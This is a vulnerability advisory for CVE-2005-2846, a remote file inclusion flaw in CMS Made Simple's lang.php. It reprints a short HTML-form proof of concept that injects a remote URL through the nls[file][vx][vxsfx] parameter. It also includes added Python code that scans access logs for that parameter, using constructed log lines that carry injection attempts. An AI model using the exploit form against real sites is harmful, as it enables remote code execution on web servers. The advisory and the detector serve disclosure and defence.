CMS Made Simple Lang.PHP Remote File Include Vulnerability

Vulnerability ID 1109042 Vulnerability type Input validation
Published 2005-08-31 Updated 2005-10-20
CVE ID CVE-2005-2846
CNNVD-ID CNNVD-200509-095
Platform PHP CVSS score 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/26217
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-095
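|Vulnerability details
CMS Made Simple is an easy-to-use content management system for websites with simple, stable content. It is developed with PHP, MySQL and the Smarty template engine. Its features include a role-based permission management system, an intelligent caching mechanism (data is fetched from the database only when needed), a wizard-based installation and update mechanism, and low system resource usage; it also includes file management, news publishing and RSS modules. A PHP remote file inclusion vulnerability in the lang.php file of CMS Made Simple 0.10 and earlier allows remote attackers to execute arbitrary PHP code via the nls[file][vx][vxsfx] parameter.
|Exploit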
source: http://www.securityfocus.com/bid/14709/info

CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

CMS Made Simple Version .10 and all prior versions are reported vulnerable. 

example.html:
<form action="http://www.example.com/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF
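
A defender-side check for the request shape shown above, as an added example that is not part of the original advisory or of the CMS Made Simple code base: it scans web-server access logs for requests to admin/lang.php that supply the nls parameter themselves. The log lines are constructed, the function name `find_nls_injection` is hypothetical, and treating every client-supplied nls value as suspicious is an assumption.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed access-log lines (combined log format); addresses and hosts are made up.
SAMPLE_LOG = [
    '198.51.100.7 - - [31/Aug/2005:10:01:02 +0000] "POST /admin/lang.php?CMS_ADMIN_PAGE=1'
    '&nls%5Bfile%5D%5Bvx%5D%5Bvxsfx%5D=http%3A%2F%2Fremote.invalid%2Fx.txt HTTP/1.1" 200 512',
    '198.51.100.8 - - [31/Aug/2005:10:02:10 +0000] "GET /cms/admin/lang.php?CMS_ADMIN_PAGE=1'
    '&nls[file][vx][vxsfx]=lang/en_US.php HTTP/1.1" 200 512',
    '203.0.113.9 - - [31/Aug/2005:10:03:00 +0000] "GET /admin/lang.php HTTP/1.1" 200 2048',
    '203.0.113.9 - - [31/Aug/2005:10:03:05 +0000] "GET /index.php?page=nls HTTP/1.1" 200 4096',
    '203.0.113.9 - - [31/Aug/2005:10:03:09 +0000] "GET /admin/lang.php?change_cms_lang=en_US'
    ' HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Parameter named "nls" or any array element of it, e.g. nls[file][vx][vxsfx].
NLS_NAME_RE = re.compile(r'^nls(\[|$)', re.IGNORECASE)
# Value pointing off-host or at a stream wrapper: "scheme:", "//host" or "\\host".
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:|//|\\\\)', re.IGNORECASE)


def find_nls_injection(lines):
    """Return one finding per nls parameter sent by a client to admin/lang.php."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not unquote(path).lower().endswith("/admin/lang.php"):
            continue
        # parse_qsl percent-decodes names and values, so nls%5Bfile%5D is caught too.
        for name, value in parse_qsl(query, keep_blank_values=True):
            if NLS_NAME_RE.match(name.strip()):
                findings.append({
                    "line": lineno,
                    "client": m.group("client"),
                    "param": name,
                    "value": value,
                    "remote": bool(REMOTE_RE.match(value)),  # True: remote include attempt
                })
    return findings


if __name__ == "__main__":
    for finding in find_nls_injection(SAMPLE_LOG):
        print(finding)
```

Access logs record only the query string, so an nls value sent in a POST body is not visible to this check and needs request-body logging or a WAF rule instead.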
|References

Source: SECUNIA
Name: 16654
Link: http://secunia.com/advisories/16654/
Source: forum.cmsmadesimple.org
Link: http://forum.cmsmadesimple.org/index.php/topic,1549.0.html
Source: BID
Name: 14709
Link: http://www.securityfocus.com/bid/14709
Source: BUGTRAQ
Name: 20050831CMSMadeSimple<=0.10-PHPinjection
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112552342004406&w=2
